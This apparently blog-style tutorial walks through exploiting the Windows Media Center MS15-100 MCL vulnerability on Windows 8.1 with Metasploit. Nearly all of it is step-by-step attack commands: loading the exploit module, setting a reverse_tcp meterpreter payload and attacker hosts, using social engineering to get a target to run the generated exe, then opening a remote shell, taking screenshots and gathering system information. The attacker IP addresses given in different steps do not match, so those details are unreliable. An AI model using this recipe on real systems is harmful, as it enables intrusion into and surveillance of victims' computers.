NOTE: THIS POST IS ONLY FOR EDUCATIONAL PURPOSES. USE THIS AT YOUR OWN RISK.
This post is about Microsoft Windows Media Centre MCL vulnerability. In this Post we discuss about MCL(MS15-100) vulnerability and exploit this vulnerability to compromise the windows 8.1 pro.
The vulnerability could allow remote code execution if Windows Media Center opens a specially crafted Media Center link (.mcl) file that references malicious code. An attacker who successfully exploited this vulnerability could gain the same user rights as the current user.
This security update is rated Important for all supported editions of Windows Media Center when installed on Windows Vista, Windows 7, Windows 8, or Windows 8.1.
AFFECTED OPERATING SYSTEMS
|Windows Vista Service Pack 2|
|Windows Vista x64 Edition Service Pack 2|
|Windows 7 for 32-bit Systems Service Pack 1|
|Windows 7 for x64-based Systems Service Pack 1|
|Windows 8 for 32-bit Systems|
|Windows 8 for x64-based Systems|
|Windows 8.1 for 32-bit Systems|
|Windows 8.1 for x64-based Systems|
We will use Metasploit to exploit the MCL (MS15_100) vulnerability. Using Metasploit we use MS15_100 exploit module. We create a malicious executable file and with some kind of social engineering tricks put this file to our target, as well as our target executes this he/she pawned.
We will use Windows 8.1 Pro as a Target Machine which running live and Kali Linux 2.0 Machine as a Attacker Machine which is also running Live. Kali Linux IP Address à 126.96.36.199
Steps of Exploitation
First of all open terminal in Kali Linux machine and type msfconsole. This command start Metasploit but this take little bit time, wait for some moments Metasploit will run as you can see in picture
Now we have to load our exploit of MCL vulnerability which is pre-installed in Metasploit. So to load it type use exploit/windows/fileformat/ms15_100_mcl_exe. This command load our exploit.
Set payload for reverse connection of target machine type set payload windows/meterpreter/reverse_tcp
Now check the required options for exploit and payload. to check these type show options and it display all required options
Here we have to configure exploit and payload. We have to set srvhost (server host address), on this address our exploit is hosted. To set srvhost type set srvhost <your kali linux machine ip address>
Set local host(lhost) address for payload . This address is also our Kali linux machine’s ip address which used to get reverse connection.
To find your kali linux machine ip address run a new terminal and type ifconfig
Step 5. Now set the srvhost and lhost .. as you see in picture.
type set srvhost 188.8.131.52
type set lhost 184.108.40.206
All weapons are loaded just fire up our weapons by type exploit command. As you type exploit it creates malicious executable file with mcl link. Get this file on our target machine with some kind of social engineering techniques.
Open the link in target machine which is genrated by exploit. in my case this link is \\220.127.116.11\GkRhdy\msf.exe and download the exe file
Now check the meterpreter sessions type sessions -i command
To get the meterpreter session type session -i <id> command for example sessions -i 1 and you get the merterpreter session
In meterpreter session we can do lots of things. here we type help command to check what interesting commands we can run
I run screenshot command in meterpreter to get the screen shot of target machine and it saved in /root directory. After that i run one more command , the shell command to get the cmd of target machine and we get the cmd of target machine
After getting the cmd of traget machine i type systeminfo command and get all the details of target machine.
Author — Kamaljeet Kumar – Information Security Engineer, Codec Networks, Delhi